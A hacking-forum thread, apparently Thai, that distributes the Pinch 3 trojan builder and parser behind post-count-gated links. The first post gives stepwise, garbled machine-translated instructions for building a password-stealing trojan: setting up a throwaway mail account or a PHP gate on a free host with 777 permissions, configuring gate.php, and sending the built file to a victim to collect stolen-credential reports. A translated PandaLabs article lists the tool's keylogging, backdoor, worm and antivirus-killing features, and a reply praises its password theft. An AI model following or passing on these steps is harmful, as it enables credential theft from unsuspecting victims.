Results 1 to 2 of 2

Thread: Pinch+PECompact 2

  1. #1
    Jedi Global Moderator akira's Avatar
    Join Date
    Nov 2006
    Posts
    538


    Pinch+PECompact 2

    Pinch 3 Builder.exe





    Pinch 3 Builder(gate).exe





    Parser2.exe(2.2.2.2)



    Download:

    **Hidden Content: To see this hidden content your post count must be 55 or greater.**



    Parser PRO v2.3.1.8



    **Hidden Content: To see this hidden content your post count must be 55 or greater.**


    gate.php

    **Hidden Content: To see this hidden content your post count must be 55 or greater.**


    Pinch 3 smtp
    1. Download the archive
    2. Register soap left in the Mail.ru
    3. Starting pinch3 Builder.exe configure
    3.1.in the E-Mail will introduce a soap just zaregeli at UCF
    3.2.in the box, enter a User ID of soap (for example: if zaregeli 123@mail.ru To introduce 123)
    3.3.put in password from the soap which recently KBIS
    3.4.in another field E-Mail (Where Reciever) put in your address where слать Records
    3.5.Compress Build remove a tick ....
    3.6.Build Select buttons Build
    4. The rest can not touch
    5. Starting saved exe or zasylaem tvoja soap at the victim should have come report.bin (or as indicated in bildere)
    6. flim file in the C: \ reports \ (if not create)
    7. Running and enjoy Parser2.exe


    Pinch 3 http
    What is required:
    1. Pinch gate
    2. Gate.php (a script that will be poured on the FTP, in the archives of pinchem)
    3. Hosting which will be our gate.php (supports php)


    Continuing reports come at 122mb.com (I proverno)), but in general can be any hosting with php.


    FTP login to the root directory and create a folder gate (no matter what), and give it the right 777.

    The file gate.php can change the parameter:
    Code:

    Code:
    $mode = 2; //1.Send to e-mail, 2.Save to file, 3.E-mail+file

    $mode =

    1 if the records will be used for soap
    2 if records are maintained here on FTP
    if the records are 3 and will go on soap and remain at FTP.

    Perekidyvaem gate.php file in a folder file gate and give all the right 777.
    To check the gate propishi gate.php path to the browser if it is correct to FTP sozdatsya empty file a report without extension. Название файла - дата когда пришёл отчёт. File name - the date when the record came.

    Pinch
    Starting Pinch 3 Builder (gate). Exe
    1. Host - here writing a web site address (example - pupkin.122mb.com)
    2. The road to gate.php, (if the names on the FTP folders done on the instructions, then it may even bother)
    3. They write almost, if we chose to send reports on the soap
    4. Subject if you chose to send mail records
    5. It will be called the report (not touch bin Extensions) (also only for mail)
    6. It is just the item for encryption Trojan will not be seen antivirus already obsolete
    7. Compress three
    8. Select Build

    Troy appears in the folder with bilderom.

    --
    PandaLabs พบเครื่องมือสร้างโทรจัน ที่สามารถสร้างได้ตั้งแต่โทรจันนักดาวน์โหลดไปจนถึงโทรจันขโมยรหัสผ่าน วางจำหน่ายบนเว็บบอร์ดหลายแห่ง

    - ผู้ใช้เครื่องมือนี้สามารถซ่อนโทรจัน เข้ารหัสข้อมูลที่ขโมยได้ หรือเปลี่ยนคอมพิวเตอร์ให้กลายเป็นกองทัพผีดิบ ได้อย่างง่ายดาย

    PandaLabs เปิดเผยเกี่ยวกับการค้นพบโปรแกรม Pinch ซึ่งมีวางจำหน่ายบนเว็บบอร์ดหลายแห่ง โปรแกรมนี้ใช้สำหรับสร้างโทรจัน และกำหนดการโจมตีในรูปแบบต่างๆ

    “ ภัยที่สำคัญจากโปรแกรม Pinch คือมันใช้งานได้ง่ายมาก ขอเพียงผู้ใช้มีทักษะคอมพิวเตอร์เล็กน้อยก็จะสามารถสร้างโทรจันได้อย่างรวดเร็วและง่ายดาย โดยใช้ต้นทุนเพียงน้อยนิด ” นาย Luis Corrons ผู้อำนวยการด้านเทคนิคของศูนย์วิจัย PandaLabs เปิดเผย

    หนึ่งในความสามารถหลักๆ ของ Pinch คือผู้โจมตีสามารถระบุข้อมูลที่ต้องการให้โทรจันขโมยได้ โดยในแท็บ PWD ผู้ใช้สามารถเลือกประเภทของรหัสผ่านที่ต้องการขโมย ไม่ว่าจะเป็นรหัสผ่านอีเมลหรือจะเป็นรหัสผ่านที่เก็บไว้ในเครื่องมือจัดการระบบต่างๆ เราสามารถสั่งให้โทรจันเข้ารหัสข้อมูลเหล่านี้ก่อนส่งเพื่อมิให้ใครสามารถอ่านได้

    แท็บ SPY ทำให้เหล่าอาชญากรสามารถเปลี่ยนโทรจันให้กลายเป็นโปรแกรมบันทึกการกดแป้นพิมพ์ได้ โทรจันจะบันทึกการกดแป้นพิมพ์ทั้งหมดจากผู้ใช้ จับภาพหน้าจอ ขโมยข้อมูลจากเบราว์เซอร์ และค้นหาไฟล์บางไฟล์ในระบบเป้าหมาย

    แท็บ NET ใน Pinch ใช้สำหรับเปลี่ยนคอมพิวเตอร์ที่ติดเชื้อให้กลายเป็นพร็อกซี เพื่อซ่อนร่องรอยกิจกรรมอันไม่ชอบมาพากลต่างๆ บนอินเทอร์เน็ต นอกจากนี้ยังสามารถเปลี่ยนโทรจันเป็นโปรแกรมนักดาวน์โหลดซึ่งจะดาวน์โหลดไฟล์สั่งการอื่นๆ เข้าสู่คอมพิวเตอร์ที่ติดเชื้อ

    แท็บ BD ใช้กำหนดพอร์ตที่ต้องการให้โทรจันเปิดเพื่อสร้างประตูหลัง และแท็บ ETC ใช้สำหรับซ่อนโทรจันโดยใช้เทคนิคต่างๆ เช่น rootkits

    ความสามารถที่เป็นอันตรายที่สุดอย่างหนึ่งของ Pinch ซ่อนอยู่ในแท็บ WORM เหล่าอาชญากรสามารถเพิ่มความสามารถของเวิร์มเข้าในโทรจันที่สร้างขึ้น เพื่อให้สามารถแพร่กระจายตัวเอง ทำให้ไฟล์ติดเชื้อ หรือส่งตัวเองออกทางอีเมล

    Pinch ยังเปิดให้ผู้ใช้ดำเนินการอื่นๆ เช่น เปลี่ยนคอมพิวเตอร์เป็นกองทัพซอมบี้ ซ่อนโทรจันให้ตรวจจับได้ยากขึ้น และ “ ฆ่า” กระบวนงานบางอย่างของระบบ โดยเฉพาะอย่างยิ่ง กระบวนงานของผลิตภัณฑ์รักษาความปลอดภัย

    และสุดท้าย Pinch เปิดให้ผู้ใช้สามารถกำหนดวิธีการส่งข้อมูลกลับไปยังผู้สร้าง ไม่ว่าจะเป็นทาง SMTP, HTTP หรือแม้แต่ทิ้งข้อมูลไว้ในไฟล์หนึ่งไฟล์ใดเพื่อเรียกดูในภายหลัง หรือส่งออกทางพอร์ตที่เปิดไว้โดยตัวของโทรจันเอง

    Pinch มาพร้อมกับโปรแกรมเล็กๆ สำหรับถอดรหัสรายงานข้อมูลที่ขโมยได้ซึ่งโทรจันสร้างขึ้น และสามารถทำการค้นหาข้อมูลที่ต้องการจากรายงานดังกล่าวได้ เหล่าอาชญากรจึงสามารถค้นหาข้อมูลที่เป็นประโยชน์สูงสุดได้อย่างง่ายดาย

    “ โปรแกรมนี้ค่อนข้างจะสมบูรณ์แบบและทำให้ผู้โจมตีสามารถสร้างโทรจันได้ทุกรูปแบบ ตั้งแต่แบบง่ายสุดไปจนถึงแบบที่ซับซ้อนและเป็นอันตราย สามารถขโมยข้อมูลลับได้ทุกประเภท ซ้ำร้ายยิ่งไปกว่านั้นคือสามารถหาซื้อได้ตามอินเทอร์เน็ต การครอบครองจึงกระทำได้โดยง่าย ” นาย Corrons สรุป

    ---
    " I think computer viruses should count as life. I think it says something about human nature that the only form of life we have created so far is purely destructive. We've created life in our own image."

    —Stephen Hawking




  2. #2
    Senior Member
    Join Date
    Jul 2004
    Location
    Thailand
    Posts
    211



    เวอร์ชั่น ก่อนหน้านี้ Opensource ด้วย Builder เขียนด้วย Delphi ตัว server เขียนด้วย asm
    สามารถ ขโมยพาสในส่วน Protected Storage ใน win 2K,xp,2k3 ได้ด้วย ทุกครังที่ดูข้อความ
    ต้องถอดรหัส ความปลอดภัยมันสุดยอดเลย....

Members who have read this thread : 0

Actions : (View-Readers)

There are no names to display.

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •